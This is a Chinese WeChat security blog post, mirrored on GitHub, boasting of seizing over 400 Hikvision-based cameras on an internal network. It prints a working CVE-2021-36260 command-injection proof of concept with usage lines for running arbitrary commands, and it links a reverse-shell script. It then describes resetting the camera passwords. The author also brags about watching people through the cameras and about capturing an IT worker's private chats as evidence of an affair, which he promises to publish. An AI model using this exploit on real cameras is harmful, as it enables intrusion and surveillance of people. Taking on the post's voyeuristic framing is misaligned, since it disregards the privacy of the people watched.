Skip to content

Latest commit

 

History

History
121 lines (73 loc) · 4.27 KB

[实战安全研究]-2023-9-16-遥遥领先!实战|一口气拿下400+摄像头.md

File metadata and controls

121 lines (73 loc) · 4.27 KB

遥遥领先!实战|一口气拿下400+摄像头

实战安全研究

实战安全研究

微信号 gh_f390fc63c711

功能介绍 我们都是网络安全爱好者,专注于网络安全技术。主要以实战讲述web渗透,代码审计和内网渗透,偶尔poc/exp开发和分享,未来主要关注Java安全。


__发表于

收录于合集

以下文章来源于X安全实验室 ,作者a16

X安全实验室 .

探索网络安全潜能!分享渗透测试技巧、代码审计,漏洞分析,最新威胁情报,涵盖AI、区块链等领域。保护数字世界,共筑坚不可摧堡垒。网络安全爱好者与普通用户皆欢迎一二线大厂|实习|内推|安全|前端|后端|运维国护|省护|攻防演练|红队|蓝队

0x0 信息收集

进入内网 使用scan进行 172整个A段的扫描 发现大量的Hikvision IP Camera。但是使用浏览器访问页面,发现是竞业达。经过谷歌搜索,发现竞业达使用的就是海康威视的产品,只不过套了一个壳。

0x1 poc验证

知道是海康威视之后,就可以直接用poc来打了。

我这里用 CVE-2021-36260这个脚本来打 。项目地址如下 https://github.com/Cuerz/CVE-2021-36260/blob/main/CVE-2021-36260.py

 headers = {  
        "host": f'{host}:{port}',  
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",  
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36",  
        'Accept': '*/*',  
        'X-Requested-With': 'XMLHttpRequest',  
        'Accept-Encoding': 'gzip, deflate',  
        'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8'  
    }  
    data = '<?xml version="1.0" encoding="UTF-8"?>' \  
           f'<language>$(>webLib/cu)</language>'  
    try:  
        resp1 = requests.put(url=origin_url + '/SDK/webLanguage', headers=headers, data=data, timeout=3, verify=False)  
        resp2 = requests.get(origin_url + '/cu')  
        if resp2.status_code == 200:  
            print(GREEN + f'[!] {url} is verified exploitable\n')  
            return True  
        else:  
            print(BLUE + f'[+] Remote is not vulnerable (Code: {resp2.status_code})\n')  
            return False  
    except:  
        print(RED + f'[-]Cannot connect to ' + url + '\n')  

使用方法:

python ./CVE-2021-36260.py -u http://192.168.1.1:8080 --check  
python ./CVE-2021-36260.py -u http://192.168.1.1:8080 --cmd "ls -la"  
python ./CVE-2021-36260.py -f target.txt  
  
optional arguments:  
  -h, --help            show this help message and exit  
  -u URL, --url URL     Start scanning url  
  -f FILE, --file FILE  read the url from the file  
  --check               Check if vulnerable  
  --cmd CMD             execute cmd (i.e: "ls -l")  

0x2 反弹shell

上面的脚本只能检测 但是如果需要反弹shell 进一步利用 需要用到这个脚本 https://github.com/Aiminsun/CVE-2021-36260/blob/main/CVE-2021-36260.py 。反弹shell之后,得到的是一个psh,这个psh只能执行一些内部自带的命令(我太菜了),但是查看摄像头足以,直接执行restpassword。然后重新刷新网页,就会提示你设置新的账号密码。下面来欣赏一下效果吧!

0x3 总结

这次的目标有大量的海康威视,运气不错。不足的是只拿到了pth,只能执行一些内部自带的命令(我还是太菜了)。后续还有很多实战,碰到的事情也很有意思,比如摄像头刚好看到小树林的事情,运维人员在办公电脑上聊天被我抓到出轨的证据,这里先发一张图预热一下,明天吃瓜.

预览时标签不可点

微信扫一扫
关注该公众号

知道了

微信扫一扫
使用小程序


取消 允许


取消 允许

: , 。 视频 小程序 赞 ,轻点两下取消赞 在看 ,轻点两下取消在看